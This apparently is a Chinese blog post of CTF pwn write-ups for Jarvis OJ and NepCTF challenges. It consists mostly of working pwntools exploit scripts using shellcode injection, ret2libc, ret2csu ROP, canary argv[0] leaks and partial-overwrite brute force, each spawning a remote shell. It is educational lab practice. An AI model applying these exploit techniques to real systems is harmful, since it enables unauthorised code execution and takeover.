Jarvis OJ pwn


阅读数: 次   
字数统计: 830字   |   阅读时长: 4分

1.level1
2.level3
3.level3_x64
4.smashes
5.easystack(nepctf)
6.[签到] 送你一朵小红花 (nepctf)

@TOC

level1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python3
from pwn import *

context(os="linux", arch="i386", log_level="debug")
content = 1


def main():
    if content == 0:
        io = process("./level1.80eacdcd51aca92af7749d96efad7fb5")
    else:
        io = remote("pwn2.jarvisoj.com",9877)

    sh=io.recvuntil("\n")[14:-2]
    print(sh)
    shell_addr=int(sh.decode(),16)

    payload =asm(shellcraft.sh())
    payload+=(0x88+4-len(payload))*b'a'
    payload+=p32(shell_addr)
    io.sendline(payload)
    io.interactive()
main()

level3

重新做这个题弄懂了接收地址时以及p32,p64,p16的一些细节

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/env python3
from pwn import *

context(os="linux", arch="i386", log_level="debug")
content = 1

#elf
elf=ELF("level3")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048484
#libc
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))

def main():
    if content == 0:
        io = process("./level3")
    else:
        io = remote("pwn2.jarvisoj.com",9879)

    payload =b'a'*(0x88+4)
    payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(8)
    #leak
    io.sendlineafter("Input:\n",payload)
    #addr=io.recvline()[:-7]
    addr=io.recv(8)
    #addr=io.recv(4)
    print(addr)
    #addr=addr.ljust(8,b'\x00')
    print(addr)
    #write_addr=u32(addr)
    write_addr=u64(addr)
    print(write_addr)
    #count
    libcbase=write_addr-write_libc
    sys_addr=libcbase+sys_libc
    binsh_addr=libcbase+binsh_libc
    #getshell
    payload=b'a'*(0x88+4)+p32(sys_addr)+b'aaaa'+p32(binsh_addr)
    io.sendline(payload)
    io.interactive()
main()

level3_x64

x64位程序调用函数一般应该使用万能gadget(ret2csu)控制参数
这个题ROPgadget中只能控制rdi和rsi,无法控制rdx,但由于调用read函数时rdx被置于0x200h,并且没有改变,rdx大于8,因此能够leak出我们所需地址,因此可以不用csu解题

这里练习一下ret2csu,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/usr/bin/env python3
from pwn import *

#rdi rsi rdx(0x200h) libc
#wn_gadget

context(os="linux", arch="amd64", log_level="debug")
content = 1

#elf
elf=ELF("level3_x64")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x40061A
pop6_addr=0x4006AA
mov3_addr=0x400690
pop_rdi=0x4006b3
#libc
libc=ELF("libc-2.19.so")
write_libc=libc.symbols['write']
sys_libc=libc.symbols['system']
binsh_libc=next(libc.search(b'/bin/sh'))

def csu(r12,r13,r14,r15,ret):
    payload =b'a'*(0x80+8)
    payload+=p64(pop6_addr)+p64(0)+p64(1)
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)
    payload+=p64(mov3_addr)
    payload+=b'a'*(56)
    payload+=p64(ret)
    io.sendline(payload)
    sleep(1)

def main():
    global io
    if content == 0:
        io = process("./level3_x64")
    else:
        io = remote("pwn2.jarvisoj.com",9883)
    #leak
    io.recvuntil("Input:\n")
    csu(write_got,8,write_got,1,main_addr)
    addr=io.recv(8)
    print(addr)
    write_addr=u64(addr)
    print(write_addr)
    #count
    libcbase=write_addr-write_libc
    sys_addr=libcbase+sys_libc
    binsh_addr=libcbase+binsh_libc
    #getshell
    io.recvuntil("Input:\n")
    payload=b'a'*(0x80+8)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
    io.sendline(payload)
    io.interactive()
main()

smashes

canary:ssp攻击(故意触发___stack_chk_fail,覆盖argv[0],输出已知地址字符串)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/env python3
from pwn import *

context(os="linux", arch="amd64", log_level="debug")
content = 1


def main():
    if content == 0:
        io = process("./smashes.44838f6edd4408a53feb2e2bbfe5b229")
    else:
        io = remote("pwn.jarvisoj.com",9877)
    payload =p64(0x0400d20)*0x200
    io.recvuntil("Hello!\nWhat's your name? ")
    io.sendline(payload)
    io.interactive()
main()

easystack(nepctf)

和smashes一个知识点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/env python3
from pwn import *

context(os="linux", arch="amd64", log_level="debug")
content = 1


def main():
    if content == 0:
        io = process("./easystack")
    else:
        io = remote("node2.hackingfor.fun",35241)
    payload = p64(0x6cde20)*100 
    io.sendline(payload)
    io.interactive()
main()

[签到] 送你一朵小红花 (nepctf)

知识点:
1.malloc开了0x18空间,而栈只有0x10空间
2.地址随机化,低位覆盖

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/env python3

from pwn import *
context(log_level="debug")
while 1:
    p = remote('node2.hackingfor.fun',32045)
    p.send(b'a'*(0x10)+p8(0xe1)) # p16(0x4e1),由于pie地址随机化,只需覆盖地位地址
    res = p.recvall()
    if b"Nep{" in res:
        break
print (res)


-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791